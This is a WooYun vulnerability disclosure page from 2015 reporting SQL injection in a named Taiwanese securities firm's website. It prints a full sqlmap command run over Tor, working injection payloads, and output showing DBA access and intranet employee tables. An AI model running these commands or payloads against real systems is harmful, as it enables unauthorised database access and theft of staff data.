台湾某证券公司SQL注入/影响内部系统 | wooyun-2015-0122024| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0122024

漏洞标题：台湾某证券公司SQL注入/影响内部系统

漏洞作者：路人甲

提交时间：2015-06-21 22:05

修复时间：2015-08-07 05:46

公开时间：2015-08-07 05:46

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：18

漏洞状态：已交由第三方合作机构(Hitcon台湾互联网漏洞报告平台)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-06-21：细节已通知厂商并且等待厂商处理中
2015-06-23：厂商已经确认，细节仅向厂商公开
2015-07-03：细节向核心白帽子及相关领域专家公开
2015-07-13：细节向普通白帽子公开
2015-07-23：细节向实习白帽子公开
2015-08-07：细节向公众公开

简要描述：

台湾某证券公司SQL注入,影响内部系统. union based的SQL注入,dba权限

详细说明：

./sqlmap.py --tor --tor-type=SOCKS5 --random-agent --time-sec=15 --technique=EU --threads=4 --union-char=n -u "http://www.gfortune.com.tw/gf_news/view_g_news.asp" --data="MNo=1735&MClass_id=400" --dbs
Parameter: MNo (POST)
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: MNo=1735' AND 3369=CONVERT(INT,(SELECT CHAR(113)+CHAR(106)+CHAR(107)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (3369=3369) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(98)+CHAR(122)+CHAR(113))) AND 'VSeN'='VSeN&MClass_id=400
    Type: UNION query
    Title: Generic UNION query (n) - 15 columns
    Payload: MNo=1735' UNION ALL SELECT CHAR(113)+CHAR(106)+CHAR(107)+CHAR(106)+CHAR(113)+CHAR(80)+CHAR(80)+CHAR(117)+CHAR(69)+CHAR(76)+CHAR(114)+CHAR(86)+CHAR(69)+CHAR(114)+CHAR(78)+CHAR(113)+CHAR(107)+CHAR(98)+CHAR(122)+CHAR(113),'n','n','n','n','n','n','n','n','n','n','n','n','n','n'-- &MClass_id=400
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2005

漏洞证明：

available databases [6]:
[*] gfIntranet  ===>内部系统?因为名字叫intranet
[*] master
[*] model
[*] msdb
[*] ReportServerTempDB
[*] tempdb
-D gfIntranet --tables --is-dba --current-user
current user:    'sa'
current user is DBA:    True
Database: gfIntranet
[70 tables]
+---------------------------------+
| ClassRoom_QA                    |
| ClassRoom_stype                 |
| EMailUS                         |
| business_trip_bak               |
| business_trip_bak               |
| cmp                             |
| department                      |
| dept_degree                     |
| dept_degree                     |
| depts                           |
| doc_conclude                    |
| doc_conclude                    |
| doc_cts                         |
| emp_position                    |
| emp_position                    |
| emp_query_definition            |
| employees                       |
| epaper                          |
<太多了,就贴这么多吧>
Database: gfIntranet
+---------------+---------+
| Table         | Entries |
+---------------+---------+
| dbo.employees | 201     | ===> 200个员工的数据
+---------------+---------+

修复方案：

过滤

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：18

确认时间：2015-06-23 05:44

厂商回复：

感謝通報

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0122024

漏洞标题：台湾某证券公司SQL注入/影响内部系统

相关厂商：台湾福邦證券

漏洞作者：路人甲

提交时间：2015-06-21 22:05

修复时间：2015-08-07 05:46

公开时间：2015-08-07 05:46

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：18

漏洞状态：已交由第三方合作机构(Hitcon台湾互联网漏洞报告平台)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0122024

漏洞标题：台湾某证券公司SQL注入/影响内部系统

相关厂商：台湾福邦證券

漏洞作者： 路人甲

提交时间：2015-06-21 22:05

修复时间：2015-08-07 05:46

公开时间：2015-08-07 05:46

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：18

漏洞状态：已交由第三方合作机构(Hitcon台湾互联网漏洞报告平台)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0122024"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云